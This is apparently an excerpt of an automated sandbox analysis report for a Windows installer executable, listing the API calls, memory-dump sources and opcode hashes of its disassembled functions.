                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                        • String ID:
                                        • API String ID: 1860320154-0
                                        • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                        • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                        • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                        • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D
                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                        • GetSysColor.USER32(?), ref: 00404775
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                        • lstrlenW.KERNEL32(?), ref: 00404796
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                        • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                        • SendMessageW.USER32(00000000), ref: 00404818
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                        • SetCursor.USER32(00000000), ref: 00404897
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                        • SetCursor.USER32(00000000), ref: 004048B3
                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: Del$N
                                        • API String ID: 3103080414-1189654992
                                        • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                        • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                        • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                        • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                        APIs
                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                        • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                        • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                        • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                        • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                          • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                          • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                        • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                        • wsprintfA.USER32 ref: 0040621C
                                        • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                        • GlobalFree.KERNEL32(00000000), ref: 00406305
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                          • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\4hIPvzV6a2.exe,80000000,00000003), ref: 0040604B
                                          • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %ls=%ls$[Rename]
                                        • API String ID: 2171350718-461813615
                                        • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                        • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                        • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                        • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(Del,00000400), ref: 004066B6
                                        • GetWindowsDirectoryW.KERNEL32(Del,00000400,00000000,0042BA48,?,?,00000000,00000000,00423E20,74DF23A0), ref: 004066CC
                                        • SHGetPathFromIDListW.SHELL32(00000000,Del), ref: 0040672A
                                        • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                        • lstrcatW.KERNEL32(Del,\Microsoft\Internet Explorer\Quick Launch,00000000,0042BA48,?,?,00000000,00000000,00423E20,74DF23A0), ref: 0040675E
                                        • lstrlenW.KERNEL32(Del,00000000,0042BA48,?,?,00000000,00000000,00423E20,74DF23A0), ref: 004067B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                        • String ID: Del$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 4024019347-2121604768
                                        • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                        • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                        • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                        • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                        • GetSysColor.USER32(00000000), ref: 00404598
                                        • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                        • SetBkMode.GDI32(?,?), ref: 004045B0
                                        • GetSysColor.USER32(?), ref: 004045C3
                                        • SetBkColor.GDI32(?,?), ref: 004045D3
                                        • DeleteObject.GDI32(?), ref: 004045ED
                                        • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                        • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                        • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                        • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                        APIs
                                        • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                          • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                        • String ID: 9
                                        • API String ID: 163830602-2366072709
                                        • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                        • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                        • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                        • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                        APIs
                                        • lstrlenW.KERNEL32(0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                        • lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                        • lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,00423E20,74DF23A0), ref: 00405637
                                        • SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2531174081-0
                                        • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                        • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                        • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                        • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                        • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                        • CharNextW.USER32(?,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                        • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-4010320282
                                        • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                        • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                        • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                        • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                        • GetMessagePos.USER32 ref: 00404EB4
                                        • ScreenToClient.USER32(?,?), ref: 00404ECE
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                        • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                        • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                        • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                        • MulDiv.KERNEL32(000D80BC,00000064,000D80C0), ref: 00402FE1
                                        • wsprintfW.USER32 ref: 00402FF1
                                        • SetWindowTextW.USER32(?,?), ref: 00403001
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402FEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                        • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                        • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                        • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                        • GlobalFree.KERNEL32(?), ref: 00402A0B
                                        • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                        • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                        • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                        • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                        APIs
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CloseEnum$DeleteValue
                                        • String ID:
                                        • API String ID: 1354259210-0
                                        • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                        • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
